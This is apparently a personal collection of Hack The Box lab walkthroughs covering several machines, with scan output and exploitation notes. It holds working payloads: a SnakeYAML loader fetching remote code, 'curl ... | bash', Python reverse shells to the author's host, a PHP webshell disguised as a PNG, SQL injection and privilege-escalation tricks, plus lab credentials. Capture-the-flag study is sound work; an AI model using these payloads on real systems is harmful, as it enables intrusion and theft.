Machine Ophiuchi - Medium - Linux

Machine Ophiuchi - Medium - Linux

• tags yaml htb tomcat linux rust wasm

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
|   256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_  256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.38
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

• fuzz
  • test/ → shows is a Tomcat/9.0.38
  • admin/ → tomcat admin
• google yaml injection, lot of hits on snake library that has a vulnerability
  • using this payload

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["10.10.14.6:8000"]
  ]]
]

a big 500 error page shows,

Can't construct a java object for tag:yaml.org,2002:java.net.URL; exception=java.lang.reflect.InvocationTargetException
 in 'string', line 3, column 5:
        !!java.net.URL ["10.10.14.6:8000"]

and shows that is crashing the snake library! we are in good track

exploit yaml parsing (java snake)

let’s clone https://github.com/artsploit/yaml-payload

modify to execute Runtime.getRuntime().exec("curl http://10.10.14.6:8000/script.sh | bash");

compile to generate the class and the jar as the readme says

create a script.sh with the bash reverse shell

now we can use the payload to execute things in the machine

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.6:8000/yaml-payload.jar"]
  ]]
]

and failed cause my java compiler is too new? java.lang.UnsupportedClassVersionError: artsploit/AwesomeScriptEngineFactory has been compiled by a more recent version of the Java Runtime

using sdkman, I installed java8…

recompile… and seems that it worked, but I didn’t get the reverse shell…

but I saw that the jar and the script.sh was requested

Yeeey! I have a shell as tomcat

from tomcat to admin

checked the tomcat-users.xml and found a password for admin password="whythereisalimit"

let’s try to ssh it… yey! we are admin!

from admin to …

admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on ophiuchi:
    (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go

cool, that a bit more tricky… to make it work we have to modify a main.wasm so we have to understand it and change the value it returns

reverse engineer a wasm

• https://github.com/WebAssembly/wabt

with wasm-decompile we can see the real code

export memory memory(initial: 16, max: 0);

global g_a:int = 1048576;
export global data_end:int = 1048576;
export global heap_base:int = 1048576;

table T_a:funcref(min: 1, max: 1);

export function info():int {
  return 0
}

not let’s see if we can do something similarfind

in my computer I did another wasm that returns a value of 1 (to pass the condition) → making it to execute a bash script I could hijack (executing in another directory)

with that give suid to /bin/bash and finished!

Link to original

Machine - Omni - Easy - Windows - Abandoned

Machine - Omni - Easy - Windows - Abandoned

PORT      STATE SERVICE    REASON
135/tcp   open  msrpc      syn-ack ttl 127
5985/tcp  open  wsman      syn-ack ttl 127
8080/tcp  open  http-proxy syn-ack ttl 127
29817/tcp open  unknown    syn-ack ttl 127
29819/tcp open  unknown    syn-ack ttl 127
29820/tcp open  unknown    syn-ack ttl 127

PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
|_http-title: Site doesn't have a title.
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.92%I=7%D=10/24%Time=61757393%P=x86_64-pc-linux-gnu%r(
SF:NULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,
SF:"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x
SF:04G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\
SF:xc9}\xc8O\x12");

• 135
  • rpcdump send a lot of things
• 5985 seems to be winrm port being open
  • But I don’t have any user/password
• 8080
  • has a basic auth …
  • we could try to fuzz it…
    • 8080/FUZZ
    • 8080/FUZZ.asp
    • 8080/FUZZ.aspx
    • 8080/FUZZ.php
• 29817
  • nothing on netcat
• 29819
  • nc send a PING
• 29820
  • nc send some weird chars

So after looking closely to the ports, it seems it’s a windows iOT and there is a exploit to execute commands https://github.com/SafeBreach-Labs/SirepRAT

since winrm is already open… I will create a new user

 python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c net user kozko kozko /add"

and give it administration permission

 python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c net localgroup Administrators kozko /add"

 evil-winrm -i 10.10.10.204 -u kozko

didn’t work :(

in the port 8080, now that we have a user, we can login :)

with nc64.exe we got a shell

and in thew folder c:\Data\Users\app there is a file user.txt with the following content

type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
    </Props>
  </Obj>
</Objs>

Link to original

Machine Sense - Easy - Linux

Machine Sense - Easy - Linux

PORT    STATE SERVICE REASON
80/tcp  open  http    syn-ack ttl 63
443/tcp open  https   syn-ack ttl 63

PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_http-title: Login
|_ssl-date: TLS randomness does not represent time

found in the changelog.txt

# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

in 443:

000000061:   200        173 L    425 W      6689 Ch     "help"
000000171:   200        173 L    425 W      6690 Ch     "stats"
000000614:   200        173 L    425 W      6689 Ch     "edit"
000000679:   200        173 L    425 W      6692 Ch     "license"
000000706:   200        173 L    425 W      6691 Ch     "system"
000000764:   200        173 L    425 W      6691 Ch     "status"
000001469:   200        173 L    425 W      6689 Ch     "exec"
000002741:   200        173 L    425 W      6690 Ch     "graph"
000004492:   200        173 L    425 W      6691 Ch     "wizard"
000006268:   200        173 L    425 W      6688 Ch     "pkg"
000017049:   200        16 L     26 W       384 Ch      "xmlrpc"
000034780:   200        173 L    425 W      6691 Ch     "reboot"
000046785:   200        173 L    425 W      6695 Ch     "interfaces"

• found a system-users.txt

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

we can login with rohit and pfsense

now we know is the **2.1.3-RELEASE ** (amd64)

there is a exploit… we got root access just by the exploit xD

Link to original

Machine - Book - Linux - Medium

Machine - Book - Linux - Medium

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
|   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
|   /admin/: Possible admin folder
|_  /admin/index.php: Possible admin folder
|_http-server-header: Apache/2.4.29 (Ubuntu)

fuzzing

• Cnould create a user for the normal portal
• there is a /admin portal that doesnt allow to create users
• in the page as normal user I can upload things…
• we have another user admin@book.htb
• there is a place to send email… maybe we can do some xss
  • didn-t work :(
• sql injection (nop)
• sql truncation

reader → root

• I could connect to the db and try to get the password of admin…
• no suid that I could see
• no sudo -l
• in the database the password is not salt or crypted Sup3r_S3cur3_P455
• maybe something is executed at regular intervals…
  • let’s use https://github.com/DominicBreuker/pspy
  • I see
    • /root/log.sh
    • /root/reset.sh
    • /root/clean.sh
    • but I cannot do anything :(
• I see in the suid something about lxc and there is an exploit…
  • no way, i don’t have the lxc group
• I saw that there is a logrotate every know and then executed as a root
  • and there is an exploit for that https://github.com/whotwagner/logrotten
  • exploits a race condition, making it possible to write as theuser root
  • we could try to copy the authorized_keys to /root/.ssh/authorized_keys

echo “python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.6”,4646));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’” & ./logrotten -d -p ./payloadfile /home/reader/backups/access.log

	```
	
## Machines

![[Machine - Previse]]

![[Machine - Explore]]

![[Machine - Seal]]

![[Machine - Writer (Abandoned)]]


![[Machine - BountyHunter]]

Link to original

Machine - PopCorn - Linux - Medium -abandoned

Machine - PopCorn - Linux - Medium

22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
| http-enum:
|   /test/: Test page
|   /test.php: Test page
|   /test/logon.html: Jetty
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.2.12 (Ubuntu)

• php5.2.10
• ubuntu 6.10
• test folder always shows a phpinfo
• fuzzing for .txt or .php

000004023:   301        9 L      28 W       310 Ch      "torrent"
000011416:   301        9 L      28 W       309 Ch      "rename"

• in the torrent
  • we could upload a torrent
  • let’s try to modify the torrent to add a cmd …
  • no way :(
  • there is a way to upload a png
  • I could upload the png, but I saw no way of executing
  • let’s see if I can move it with the rename endpoiint
  • yey! we got our magic php shell :)

echo -n -e '\x89\x50\x4E\x47'
echo '<?php system($_GET["cmd"]); ?>' >> img.php.png

from www-data to george or root

• enumeration
  • mysql local
  • pspy
    • nothing interesting
    • sudo -l → nothing
  • there is a source code of the torrenthoster
    • lets upload to my pc

  $CFG->host = "localhost";
  $CFG->dbName = "torrenthoster";       //db name
  $CFG->dbUserName = "torrent";    //db username
  $CFG->dbPassword = "SuperSecret!!";   //db password

|  3 | Admin    | d5bfedcee289e5e05b86daad8ee3e2e2 | admin     | admin@yourdomain.com | 2007-01-06 21:12:46 | 2007-01-06 21:12:46 |

let’s try to crack the md5 hash no luck :(

• abandon!

Machine - PopCorn - Linux - Medium

22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
| http-enum:
|   /test/: Test page
|   /test.php: Test page
|   /test/logon.html: Jetty
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.2.12 (Ubuntu)

• php5.2.10
• ubuntu 6.10
• test folder always shows a phpinfo
• fuzzing for .txt or .php

000004023:   301        9 L      28 W       310 Ch      "torrent"
000011416:   301        9 L      28 W       309 Ch      "rename"

• in the torrent
  • we could upload a torrent
  • let’s try to modify the torrent to add a cmd …
  • no way :(
  • there is a way to upload a png
  • I could upload the png, but I saw no way of executing
  • let’s see if I can move it with the rename endpoiint
  • yey! we got our magic php shell :)

echo -n -e '\x89\x50\x4E\x47'
echo '<?php system($_GET["cmd"]); ?>' >> img.php.png

from www-data to george or root

• enumeration
  • mysql local
  • pspy
    • nothing interesting
    • sudo -l → nothing
  • there is a source code of the torrenthoster
    • lets upload to my pc

  $CFG->host = "localhost";
  $CFG->dbName = "torrenthoster";       //db name
  $CFG->dbUserName = "torrent";    //db username
  $CFG->dbPassword = "SuperSecret!!";   //db password

|  3 | Admin    | d5bfedcee289e5e05b86daad8ee3e2e2 | admin     | admin@yourdomain.com | 2007-01-06 21:12:46 | 2007-01-06 21:12:46 |

let’s try to crack the md5 hash no luck :(

• abandon!

Link to original

Machine - Falafel - Linux - Hard - abandoned

Machine - Falafel - Linux - Hard - abandoned

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
|   256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_  256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-enum:
|   /login.php: Possible admin folder
|_  /robots.txt: Robots file
|_http-server-header: Apache/2.4.18 (Ubuntu)

Enumeration http

• is disalowwed the txt…
  • let’s fuzz for txt xD
  • IT@falafel.htb

From: Falafel Network Admin (admin@falafel.htb)
Subject: URGENT!! MALICIOUS SITE TAKE OVER!
Date: November 25, 2017 3:30:58 PM PDT
To: lawyers@falafel.htb, devs@falafel.htb
Delivery-Date: Tue, 25 Nov 2017 15:31:01 -0700
Mime-Version: 1.0
X-Spam-Status: score=3.7 tests=DNS_FROM_RFC_POST, HTML_00_10, HTML_MESSAGE, HTML_SHORT_LENGTH version=3.1.7
X-Spam-Level: ***

A user named "chris" has informed me that he could log into MY account without knowing the password,
then take FULL CONTROL of the website using the image upload feature.
We got a cyber protection on the login form, and a senior php developer worked on filtering the URL of the upload,
so I have no idea how he did it.

Dear lawyers, please handle him. I believe Cyberlaw is on our side.
Dear develpors, fix this broken site ASAP.

	~admin

using sqlmap we got the dump of the database

Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-8697' OR 1118=1118-- bVwQ&password=admin

[10:32:40] [INFO] retrieved: 1
[10:32:41] [INFO] retrieved: 0e462096931906507119562988736854
[10:32:57] [INFO] retrieved: admin
[10:32:59] [INFO] retrieved: admin
[10:33:01] [INFO] retrieved: 2
[10:33:02] [INFO] retrieved: d4ee02a22fc872e36d9e3751ba72ddc8
[10:33:18] [INFO] retrieved: normal
[10:33:20] [INFO] retrieved: chris
[10:33:23] [INFO] recognized possible

Login as admin

password of chris is juggling the hash of admin I could not crack…

but I think we should be able to login with the sqli

at the end there also type jugling, since the hash starts by 0e it means that if we find a password that the md5 starts also with 0e we should be able to login

admin 240610708

Upload image /// shell

 python image.py "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCAAABB.php.png"

we got a shell :D

from www-data to …

   define('DB_SERVER', 'localhost:3306');
   define('DB_USERNAME', 'moshe');
   define('DB_PASSWORD', 'falafelIsReallyTasty');
   define('DB_DATABASE', 'falafel');

let’s improve our shell with rlwrap

we try the password in ssh and voila we are moshe now :)

from moshe to root?

there is another user yossi

/$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)

Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Distributor ID: Ubuntu
Description:    Ubuntu 16.04.3 LTS
Release:        16.04
Codename:       xenial

pspy

• nothing

Link to original

Machine Previse - Active - Easy

Machine Previse - Active - Easy

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

fuzzing

• no extension
• php extension
  • we found some php that need to be auth to see
  • config.php
  • nav.php ⇐ shows propably php files
  • accounts.php
    • there is a redirect, but you still see the page in curl
    • we could do a post to create a new user/password :devil:
    • YEEY we got a user :D
• txt extension

inspecting web page

• there is a login
• it says a file service
• is using phpsession
• no js or comments

Step 2: what we can do with an admin user…

• there is a file uploaded by newguy
  • there is a config.php with mysql credentials

    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';

in the code we see this

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log"; 

which could be a way to execute whatever we want :)

curl 'http://10.10.11.104/logs.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.11.104' -H 'Connection: keep-alive' -H 'Referer: http://10.10.11.104/file_logs.php' -H 'Cookie: PHPSESSID=t3t07dbpsn2et1o41iapan02ch' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'delim=%24%28python%20-c%20%27import%20socket%2Csubprocess%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.conn

we got our shell :)

Step 3: we are www-data now what?

• we can not see yet the user flag :(
• we can connect to the db and get the flag
• ,'m4lwhere','$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.'

•                      `$1$🧂llol$DQpmdvnb7EeuO6UaqRItf`
  

• we can try to crack it with john the ripper ilovecody112235! user m4lwhere

Step 4: to be root …

• sudo -l
  • we can execute a script as root
  • the binaries in the script don’t have full path
  • so we can exploit the PATH env variable to execute the code we want :)

$  export PATH=$(pwd):$PATH
$ cat /tmp/gzip
#!/bin/bash
chmod u+s /bin/bash
$ sudo /opt/scripts/access_backup.sh

Link to original

Machine - Forge - Active - Medium - done

Machine - Forge - Active - Medium

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://forge.htb
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: 10.10.11.111; OS: Linux; CPE: cpe:/o:linux:linux_kernel

• let’s add a forge.htb to the host

exploration

• we can upload images… (vector attack)
• we can request from url

FUZZ

• there is an admin domain admin.forge.htb
  • Only localhost is allowed!
• using the download images from http, we could connect to the admin and saw a credential for an ftp user:heightofsecurity123

        <li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li>
        <li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
        <li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=&lt;url&gt;.</li>

• ssh only allows to login with key… which makes me think if we can get some id_rsa or upload an authorized_…

 <div id="content">
            <h2 onclick="show_upload_local_file()">
                Upload local file
            </h2>
            <h2 onclick="show_upload_remote_file()">
                Upload from url
            </h2>
            <div id="form-div">

            </div>
        </div>

function show_upload_local_file(argument) {
    var form_div = document.getElementById('form-div');
    form_div.innerHTML = `
        <form action="/upload" method="POST" enctype="multipart/form-data">
            <input type="file" name="file" class="file">
            <input name="local" type="hidden" value='1'>
            <br>
            <br>
            <button id="submit-local" type="submit" class="submit">Submit</button>
        </form>
        `;
}

function show_upload_remote_file(argument) {
    var form_div = document.getElementById('form-div');
    form_div.innerHTML = `
    <br><br>
        <form action="/upload" method="POST" enctype="application/x-www-form-urlencoded" >
            <input type="textbox" name="url" class="textbox">
            <input name="remote" type="hidden" value='1'>
            <br>
            <br>
            <button id="submit-remote" type="submit" class="submit">Submit</button>
        </form>
        `;
}

with a bit of twerking the urlencode, we get to see the user flag :)

also we can read the .ssh/id_rsa and with that we can log into the user with ssh :D

user to …

sudo ⇒ (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py

#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb

port = random.randint(1025, 65535)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('127.0.0.1', port))
    sock.listen(1)
    print(f'Listening on localhost:{port}')
    (clientsock, addr) = sock.accept()
    clientsock.send(b'Enter the secret passsword: ')
    if clientsock.recv(1024).strip().decode() != 'secretadminpassword':
        clientsock.send(b'Wrong password!\n')
    else:
        clientsock.send(b'Welcome admin!\n')
        while True:
            clientsock.send(b'\nWhat do you wanna do: \n')
            clientsock.send(b'[1] View processes\n')
            clientsock.send(b'[2] View free memory\n')
            clientsock.send(b'[3] View listening sockets\n')
            clientsock.send(b'[4] Quit\n')
            option = int(clientsock.recv(1024).strip())
            if option == 1:
                clientsock.send(subprocess.getoutput('ps aux').encode())
            elif option == 2:
                clientsock.send(subprocess.getoutput('df').encode())
            elif option == 3:
                clientsock.send(subprocess.getoutput('ss -lnt').encode())
            elif option == 4:
                clientsock.send(b'Bye\n')
                break
except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)
finally:
    quit()

since there is a pdb at the end… when we do Ctrl-c we bring an exception and… boom we have a python shell, we can import os.system and execute commands as root.

Link to original

Machine - Devzat - active - medium - completed!

Machine - Devzat - active - medium

PORT     STATE SERVICE  REASON
22/tcp   open  ssh      syn-ack ttl 63
80/tcp   open  http     syn-ack ttl 63
8000/tcp open  http-alt syn-ack ttl 63

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
|   256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_  256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://devzat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
8000/tcp open  ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-Go
| ssh-hostkey:
|_  3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.92%I=7%D=11/3%Time=6182EB1F%P=x86_64-pc-linux-gnu%r(NU
SF:LL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

fuzz on :80

fuzz on vhost

• pets.devzat.htb
  • < Server: My genious go pet server

curl 'http://pets.devzat.htb/api/pet' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://pets.devzat.htb/aaa' -H 'Content-Type: text/plain;charset=UTF-8' -H 'Origin: http://pets.devzat.htb' -H 'Connection: keep-alive' --data-raw '{"name":"ddd","species":"giraffe"}'

• tried simple sql injection and the insert has changed…

curl 'http://pets.devzat.htb/api/pet' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://pets.devzat.htb/aaa' -H 'Content-Type: text/plain;charset=UTF-8' -H 'Origin: http://pets.devzat.htb' -H 'Connection: keep-alive' --data-raw $'{"name":"something\' or 1=1 -- -"}'

with the species parameter, we can read files by ; cat /etc/passwd

we can read the .ssh/id_rsa :) YEEEY

explore

ssh -l [username] devzat.htb -p 8000 the page has an email patric@devzat.htb

patrick to…

we can not read yeat the catherine :( sudo -l ⇒ I don’t have the password… suid → nothing int in the chat app I see the following “chats”

admin: Connection to localhost closed.
patrick@devzat:~$ ssh -l catherine localhost -p 8000
patrick: Hey Catherine, glad you came.
catherine: Hey bud, what are you up to?
patrick: Remember the cool new feature we talked about the other day?
catherine: Sure
patrick: I implemented it. If you want to check it out you could connect to the local dev instance on port 8443.
catherine: Kinda busy right now 👔
patrick: That's perfectly fine 👍  You'll need a password I gave you last time.
catherine: k
patrick: I left the source for your review in backups.
catherine: Fine. As soon as the boss let me off the leash I will check it out.
patrick: Cool. I am very curious what you think of it. See ya!
devbot: patrick has left the chat

admin: Hey patrick, you there?
patrick: Sure, shoot boss!
admin: So I setup the influxdb for you as we discussed earlier in business meeting.
patrick: Cool 👍
admin: Be sure to check it out and see if it works for you, will ya?

tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN
